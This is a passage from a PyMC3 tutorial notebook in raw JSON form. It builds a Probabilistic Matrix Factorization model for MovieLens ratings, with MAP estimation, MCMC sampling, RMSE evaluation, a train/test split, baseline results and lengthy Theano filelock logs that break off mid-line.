nan_mask = np.isnan(self.data)\n self.data[nan_mask] = self.data[~nan_mask].mean()\n\n # Low precision reflects uncertainty; prevents overfitting.\n # Set to the mean variance across users and items.\n self.alpha_u = 1 / self.data.var(axis=1).mean()\n self.alpha_v = 1 / self.data.var(axis=0).mean()\n\n # Specify the model.\n logging.info(\"building the PMF model\")\n with pm.Model() as pmf:\n U = pm.MvNormal(\n \"U\",\n mu=0,\n tau=self.alpha_u * np.eye(dim),\n shape=(n, dim),\n testval=np.random.randn(n, dim) * std,\n )\n V = pm.MvNormal(\n \"V\",\n mu=0,\n tau=self.alpha_v * np.eye(dim),\n shape=(m, dim),\n testval=np.random.randn(m, dim) * std,\n )\n R = pm.Normal(\n \"R\", mu=(U @ V.T)[~nan_mask], tau=self.alpha, observed=self.data[~nan_mask]\n )\n\n logging.info(\"done building the PMF model\")\n self.model = pmf\n\n def __str__(self):\n return self.name",
"_____no_output_____"
]
],
[
[
"We'll also need functions for calculating the MAP and performing sampling on our PMF model. When the observation noise variance $\\alpha$ and the prior variances $\\alpha_U$ and $\\alpha_V$ are all kept fixed, maximizing the log posterior is equivalent to minimizing the sum-of-squared-errors objective function with quadratic regularization terms.\n\n$$ E = \\frac{1}{2} \\sum_{i=1}^N \\sum_{j=1}^M I_{ij} (R_{ij} - U_i V_j^T)^2 + \\frac{\\lambda_U}{2} \\sum_{i=1}^N \\|U\\|_{Fro}^2 + \\frac{\\lambda_V}{2} \\sum_{j=1}^M \\|V\\|_{Fro}^2, $$\n\nwhere $\\lambda_U = \\alpha_U / \\alpha$, $\\lambda_V = \\alpha_V / \\alpha$, and $\\|\\cdot\\|_{Fro}^2$ denotes the Frobenius norm [3]. Minimizing this objective function gives a local minimum, which is essentially a maximum a posteriori (MAP) estimate. While it is possible to use a fast Stochastic Gradient Descent procedure to find this MAP, we'll be finding it using the utilities built into `pymc3`. In particular, we'll use `find_MAP` with Powell optimization (`scipy.optimize.fmin_powell`). Having found this MAP estimate, we can use it as our starting point for MCMC sampling.\n\nSince it is a reasonably complex model, we expect the MAP estimation to take some time. So let's save it after we've found it. Note that we define a function for finding the MAP below, assuming it will receive a namespace with some variables in it. Then we attach that function to the PMF class, where it will have such a namespace after initialization. The PMF class is defined in pieces this way so I can say a few things between each piece to make it clearer.",
"_____no_output_____"
]
],
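For reference, here is a minimal NumPy sketch of the objective $E$; `pmf_objective` is a hypothetical helper used only to make the correspondence between the formula and the model explicit (it is not what `find_MAP` calls internally):

```python
import numpy as np

def pmf_objective(R, U, V, alpha, alpha_u, alpha_v):
    """Regularized sum-of-squared-errors E; its minimizer is the MAP estimate."""
    observed = ~np.isnan(R)                       # the indicator I_ij
    resid = np.where(observed, R - U @ V.T, 0.0)  # residuals on observed cells only
    lam_u, lam_v = alpha_u / alpha, alpha_v / alpha
    return (
        0.5 * (resid**2).sum()
        + 0.5 * lam_u * (U**2).sum()  # sum_i ||U_i||_Fro^2
        + 0.5 * lam_v * (V**2).sum()  # sum_j ||V_j||_Fro^2
    )
```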
[
[
"def _find_map(self):\n \"\"\"Find mode of posterior using L-BFGS-B optimization.\"\"\"\n tstart = time.time()\n with self.model:\n logging.info(\"finding PMF MAP using L-BFGS-B optimization...\")\n self._map = pm.find_MAP(method=\"L-BFGS-B\")\n\n elapsed = int(time.time() - tstart)\n logging.info(\"found PMF MAP in %d seconds\" % elapsed)\n return self._map\n\n\ndef _map(self):\n try:\n return self._map\n except:\n return self.find_map()\n\n\n# Update our class with the new MAP infrastructure.\nPMF.find_map = _find_map\nPMF.map = property(_map)",
"_____no_output_____"
]
],
[
[
"So now our PMF class has a `map` `property` which will either be found using Powell optimization or loaded from a previous optimization. Once we have the MAP, we can use it as a starting point for our MCMC sampler. We'll need a sampling function in order to draw MCMC samples to approximate the posterior distribution of the PMF model.",
"_____no_output_____"
]
],
[
[
"# Draw MCMC samples.\ndef _draw_samples(self, **kwargs):\n kwargs.setdefault(\"chains\", 1)\n with self.model:\n self.trace = pm.sample(**kwargs)\n\n\n# Update our class with the sampling infrastructure.\nPMF.draw_samples = _draw_samples",
"_____no_output_____"
]
],
[
[
"We could define some kind of default trace property like we did for the MAP, but that would mean using possibly nonsensical values for `nsamples` and `cores`. Better to leave it as a non-optional call to `draw_samples`. Finally, we'll need a function to make predictions using our inferred values for $U$ and $V$. For user $i$ and movie $j$, a prediction is generated by drawing from $\\mathcal{N}(U_i V_j^T, \\alpha)$. To generate predictions from the sampler, we generate an $R$ matrix for each $U$ and $V$ sampled, then we combine these by averaging over the $K$ samples.\n\n$$\nP(R_{ij}^* \\given R, \\alpha, \\alpha_U, \\alpha_V) \\approx\n \\frac{1}{K} \\sum_{k=1}^K \\mathcal{N}(U_i V_j^T, \\alpha)\n$$\n\nWe'll want to inspect the individual $R$ matrices before averaging them for diagnostic purposes. So we'll write code for the averaging piece during evaluation. The function below simply draws an $R$ matrix given a $U$ and $V$ and the fixed $\\alpha$ stored in the PMF object.",
"_____no_output_____"
]
],
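The averaging happens later, during evaluation; as a rough sketch of what it will look like (assuming `draw_samples` has already been called so that `pmf.trace` holds posterior samples of `U` and `V`; `predict_posterior_mean` is a hypothetical name, and the notebook's own evaluation code may differ):

```python
import numpy as np

def predict_posterior_mean(pmf, burn_in=0):
    """Average the R matrices predicted from each posterior (U, V) sample."""
    avg = np.zeros(pmf.data.shape)
    samples = zip(pmf.trace["U"][burn_in:], pmf.trace["V"][burn_in:])
    for k, (U, V) in enumerate(samples, start=1):
        avg += (pmf.predict(U, V) - avg) / k  # incremental mean over the K samples
    return avg
```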
[
[
"def _predict(self, U, V):\n \"\"\"Estimate R from the given values of U and V.\"\"\"\n R = np.dot(U, V.T)\n n, m = R.shape\n sample_R = np.random.normal(R, self.std)\n # bound ratings\n low, high = self.bounds\n sample_R[sample_R < low] = low\n sample_R[sample_R > high] = high\n return sample_R\n\n\nPMF.predict = _predict",
"_____no_output_____"
]
],
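[
[
"With `predict` in place, the averaging in the posterior predictive formula above amounts to something like the following minimal sketch (the helper name `posterior_mean_R` is an assumption for illustration, and it presumes a fitted `pmf` whose `trace` already holds MCMC samples); the evaluation code later in the notebook performs this same averaging incrementally so that a running RMSE can be monitored:\n\n```python\ndef posterior_mean_R(pmf):\n    # Average one sampled R matrix per posterior draw of (U, V).\n    K = len(pmf.trace)\n    R_sum = sum(pmf.predict(point[\"U\"], point[\"V\"]) for point in pmf.trace)\n    return R_sum / K\n```",
"_____no_output_____"
]
],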
[
[
"One final thing to note: the dot products in this model are often constrained using a logistic function $g(x) = 1/(1 + exp(-x))$, that bounds the predictions to the range [0, 1]. To facilitate this bounding, the ratings are also mapped to the range [0, 1] using $t(x) = (x + min) / range$. The authors of PMF also introduced a constrained version which performs better on users with less ratings [3]. Both models are generally improvements upon the basic model presented here. However, in the interest of time and space, these will not be implemented here.",
"_____no_output_____"
],
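[
"Purely as an illustration of that idea (this variant is not used anywhere in this notebook, and the function name and the 1-5 rating range are assumptions), the logistic bounding could look roughly like this:\n\n```python\nimport numpy as np\n\n\ndef logistic_predict(U, V, r_min=1.0, r_max=5.0):\n    # Squash the dot products into (0, 1) with the logistic function g(x).\n    g = 1.0 / (1.0 + np.exp(-(U @ V.T)))\n    # Map back from [0, 1] to the original rating scale, inverting t(x).\n    return r_min + g * (r_max - r_min)\n```",
"_____no_output_____"
],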
[
"## Evaluation\n\n### Metrics\n\nIn order to understand how effective our models are, we'll need to be able to evaluate them. We'll be evaluating in terms of root mean squared error (RMSE), which looks like this:\n\n$$\nRMSE = \\sqrt{ \\frac{ \\sum_{i=1}^N \\sum_{j=1}^M I_{ij} (R_{ij} - R_{ij}^*)^2 }\n { \\sum_{i=1}^N \\sum_{j=1}^M I_{ij} } }\n$$\n\nIn this case, the RMSE can be thought of as the standard deviation of our predictions from the actual user preferences.",
"_____no_output_____"
]
],
[
[
"# Define our evaluation function.\ndef rmse(test_data, predicted):\n \"\"\"Calculate root mean squared error.\n Ignoring missing values in the test data.\n \"\"\"\n I = ~np.isnan(test_data) # indicator for missing values\n N = I.sum() # number of non-missing values\n sqerror = abs(test_data - predicted) ** 2 # squared error array\n mse = sqerror[I].sum() / N # mean squared error\n return np.sqrt(mse) # RMSE",
"_____no_output_____"
]
],
[
[
"### Training Data vs. Test Data\n\nThe next thing we need to do is split our data into a training set and a test set. Matrix factorization techniques use [transductive learning](http://en.wikipedia.org/wiki/Transduction_%28machine_learning%29) rather than inductive learning. So we produce a test set by taking a random sample of the cells in the full $N \\times M$ data matrix. The values selected as test samples are replaced with `nan` values in a copy of the original data matrix to produce the training set. Since we'll be producing random splits, let's also write out the train/test sets generated. This will allow us to replicate our results. We'd like to be able to idenfity which split is which, so we'll take a hash of the indices selected for testing and use that to save the data.",
"_____no_output_____"
]
],
[
[
"# Define a function for splitting train/test data.\ndef split_train_test(data, percent_test=0.1):\n \"\"\"Split the data into train/test sets.\n :param int percent_test: Percentage of data to use for testing. Default 10.\n \"\"\"\n n, m = data.shape # # users, # movies\n N = n * m # # cells in matrix\n\n # Prepare train/test ndarrays.\n train = data.copy()\n test = np.ones(data.shape) * np.nan\n\n # Draw random sample of training data to use for testing.\n tosample = np.where(~np.isnan(train)) # ignore nan values in data\n idx_pairs = list(zip(tosample[0], tosample[1])) # tuples of row/col index pairs\n\n test_size = int(len(idx_pairs) * percent_test) # use 10% of data as test set\n train_size = len(idx_pairs) - test_size # and remainder for training\n\n indices = np.arange(len(idx_pairs)) # indices of index pairs\n sample = np.random.choice(indices, replace=False, size=test_size)\n\n # Transfer random sample from train set to test set.\n for idx in sample:\n idx_pair = idx_pairs[idx]\n test[idx_pair] = train[idx_pair] # transfer to test set\n train[idx_pair] = np.nan # remove from train set\n\n # Verify everything worked properly\n assert train_size == N - np.isnan(train).sum()\n assert test_size == N - np.isnan(test).sum()\n\n # Return train set and test set\n return train, test\n\n\ntrain, test = split_train_test(dense_data)",
"_____no_output_____"
]
],
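[
[
"For completeness, here is a small sketch of the hashing idea mentioned above. It is not used in the rest of the notebook, and the function name, argument names, and file-name pattern are placeholders: the sorted test indices determine a short hash, which names the saved split so a particular run can be reloaded later.\n\n```python\nimport hashlib\n\nimport numpy as np\n\n\ndef save_split(train, test, sample_indices, prefix=\"movielens_split\"):\n    # Hash the sorted test-cell indices to get a stable identifier for this split.\n    key = hashlib.sha1(np.asarray(sorted(sample_indices)).tobytes()).hexdigest()[:8]\n    np.savez(f\"{prefix}_{key}.npz\", train=train, test=test)\n    return key\n```",
"_____no_output_____"
]
],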
[
[
"## Results",
"_____no_output_____"
]
],
[
[
"# Let's see the results:\nbaselines = {}\nfor name in baseline_methods:\n Method = baseline_methods[name]\n method = Method(train)\n baselines[name] = method.rmse(test)\n print(\"{} RMSE:\\t{:.5f}\".format(method, baselines[name]))",
"Uniform Random Baseline RMSE:\t1.67456\nGlobal Mean Baseline RMSE:\t1.13491\nMean Of Means Baseline RMSE:\t1.02368\n"
]
],
[
[
"As expected: the uniform random baseline is the worst by far, the global mean baseline is next best, and the mean of means method is our best baseline. Now let's see how PMF stacks up.",
"_____no_output_____"
]
],
[
[
"# We use a fixed precision for the likelihood.\n# This reflects uncertainty in the dot product.\n# We choose 2 in the footsteps Salakhutdinov\n# Mnihof.\nALPHA = 2\n\n# The dimensionality D; the number of latent factors.\n# We can adjust this higher to try to capture more subtle\n# characteristics of each movie. However, the higher it is,\n# the more expensive our inference procedures will be.\n# Specifically, we have D(N + M) latent variables. For our\n# Movielens dataset, this means we have D(2625), so for 5\n# dimensions, we are sampling 13125 latent variables.\nDIM = 10\n\n\npmf = PMF(train, DIM, ALPHA, std=0.05)",
"INFO:root:building the PMF model\nINFO:filelock:Lock 140478053917456 acquired on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478053917456 released on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478055446032 acquired on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478055446032 released on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478053980768 acquired on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478053980768 released on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478056199504 acquired on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478056199504 released on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478056254336 acquired on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478056254336 released on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478054023952 acquired on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478054023952 released on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478054004288 acquired on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478054004288 released on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478056201136 acquired on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478056201136 released on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478056116864 acquired on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478056116864 released on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478055757376 acquired on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478055757376 released on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478055889216 acquired on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478055889216 released on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478055447232 acquired on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478055447232 released on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478066137456 acquired on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478066137456 released 
on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478067785888 acquired on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478067785888 released on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478067813200 acquired on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478067813200 released on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478079190208 acquired on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478079190208 released on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478067698416 acquired on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478067698416 released on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478079202256 acquired on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478079202256 released on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478079365904 acquired on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478079365904 released on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478065170800 acquired on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478065170800 released on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478079299104 acquired on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478079299104 released on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478084149648 acquired on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478084149648 released on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:root:done building the PMF model\n"
]
],
[
[
"### Predictions Using MAP",
"_____no_output_____"
]
],
[
[
"# Find MAP for PMF.\npmf.find_map();",
"INFO:root:finding PMF MAP using L-BFGS-B optimization...\nINFO:filelock:Lock 140478096967952 acquired on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478096967952 released on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478096969536 acquired on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478096969536 released on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478084029600 acquired on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478084029600 released on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478096966752 acquired on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478096966752 released on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478097155600 acquired on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478097155600 released on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478084028400 acquired on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478084028400 released on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478097155648 acquired on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478097155648 released on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478404843696 acquired on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478404843696 released on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478094398704 acquired on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478094398704 released on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478096934704 acquired on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478096934704 released on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478094363664 acquired on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478094363664 released on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478084066176 acquired on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478084066176 released on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478097622640 acquired on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 
140478097622640 released on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478097481008 acquired on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478097481008 released on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478097597392 acquired on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478097597392 released on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478097086208 acquired on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478097086208 released on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478098291968 acquired on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478098291968 released on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478098291536 acquired on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478098291536 released on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478098375056 acquired on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478098375056 released on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478098409552 acquired on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478098409552 released on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478097940240 acquired on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478097940240 released on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478098292208 acquired on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478098292208 released on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478098512336 acquired on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478098512336 released on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478098570400 acquired on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478098570400 released on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478097940048 acquired on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478097940048 released on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478079202784 acquired on 
/Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478079202784 released on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478079184176 acquired on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478079184176 released on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478097931280 acquired on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478097931280 released on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478098570064 acquired on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478098570064 released on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478098375344 acquired on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478098375344 released on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478096966656 acquired on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478096966656 released on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478098428640 acquired on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478098428640 released on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478098255680 acquired on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478098255680 released on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478084264048 acquired on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478084264048 released on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478098624368 acquired on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478098624368 released on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478079184848 acquired on 